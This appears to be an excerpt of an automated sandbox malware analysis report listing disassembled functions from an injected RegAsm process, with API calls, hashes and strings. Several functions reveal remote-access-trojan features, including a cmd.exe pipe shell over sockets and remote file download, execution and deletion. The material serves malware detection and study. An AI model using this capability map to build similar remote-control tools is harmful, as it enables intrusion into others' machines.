                                                                        • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID: @
                                                                        • API String ID: 1890195054-2766056989
                                                                        • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                        • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                        • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                        • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                        APIs
                                                                          • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                                                                        • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CodeInfoPageValid
                                                                        • String ID:
                                                                        • API String ID: 546120528-0
                                                                        • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                                        • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                                                                        • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                                        • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
                                                                        APIs
                                                                          • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                        • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CodeInfoPageValid
                                                                        • String ID:
                                                                        • API String ID: 546120528-0
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                          • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                                                          • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                                                          • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                        • _free.LIBCMT ref: 0044EFD0
                                                                        • _free.LIBCMT ref: 0044F006
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorLast_abort
                                                                        • String ID:
                                                                        • API String ID: 2991157371-0
                                                                        APIs
                                                                          • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                          • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                          • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                          • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                          • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                          • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                          • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                        • _free.LIBCMT ref: 10006CD7
                                                                        • _free.LIBCMT ref: 10006D0D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                         • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorLast_abort
                                                                        • String ID:
                                                                        • API String ID: 2991157371-0
                                                                        APIs
                                                                        • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                                        • String ID:
                                                                        • API String ID: 2279764990-0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 004461A6
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$AllocAllocate_free
                                                                        • String ID:
                                                                        • API String ID: 2447670028-0
                                                                        APIs
                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                          • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateEventStartupsocket
                                                                        • String ID:
                                                                        • API String ID: 1953588214-0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        APIs
                                                                        • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                        • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                         • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                        • String ID:
                                                                        • API String ID: 3750050125-0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$ForegroundText
                                                                        • String ID:
                                                                        • API String ID: 29597999-0
                                                                        APIs
                                                                          • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                        • String ID:
                                                                        • API String ID: 806969131-0
                                                                        APIs
                                                                          • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                         • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                        • String ID:
                                                                        • API String ID: 806969131-0
                                                                        APIs
                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                         • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: __crt_fast_encode_pointer
                                                                        • String ID:
                                                                        • API String ID: 3768137683-0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                         • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __alldvrm
                                                                        • String ID:
                                                                        • API String ID: 65215352-0
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                        • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                                        • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                        • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                        • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                                        • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                        • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                                        APIs
                                                                        • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Deallocatestd::_
                                                                        • String ID:
                                                                        • API String ID: 1323251999-0
                                                                        • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                        • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                        • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                        • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: send
                                                                        • String ID:
                                                                        • API String ID: 2809346765-0
                                                                        • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                                        • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                                                                        • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                                        • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: recv
                                                                        • String ID:
                                                                        • API String ID: 1507349165-0
                                                                        • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                                        • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                                                                        • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                                        • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                        • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                        • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                        • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                        APIs
                                                                        • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                                          • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C2EC
                                                                          • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C31C
                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C371
                                                                          • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3D2
                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3D9
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                                        • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                                        • DeleteFileA.KERNEL32(?), ref: 00408652
                                                                          • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                                          • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                          • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                          • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                        • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                                        • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                                                                          • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                        • API String ID: 1067849700-181434739
                                                                        • Opcode ID: f1c4d7739d7eae771163d17408f63fe79efc26d29021ee7ab5f791f0dca45ecd
                                                                        • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                                        • Opcode Fuzzy Hash: f1c4d7739d7eae771163d17408f63fe79efc26d29021ee7ab5f791f0dca45ecd
                                                                        • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                                        APIs
                                                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                        • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                        • CloseHandle.KERNEL32 ref: 00405A23
                                                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                                                        • CloseHandle.KERNEL32 ref: 00405A45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                        • API String ID: 2994406822-18413064
                                                                        • Opcode ID: 718fc47987a68ddd7fa12657a24cae26bfc2044b7fc503c0b9c134ba558eb6a6
                                                                        • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                                        • Opcode Fuzzy Hash: 718fc47987a68ddd7fa12657a24cae26bfc2044b7fc503c0b9c134ba558eb6a6
                                                                        • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                          • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
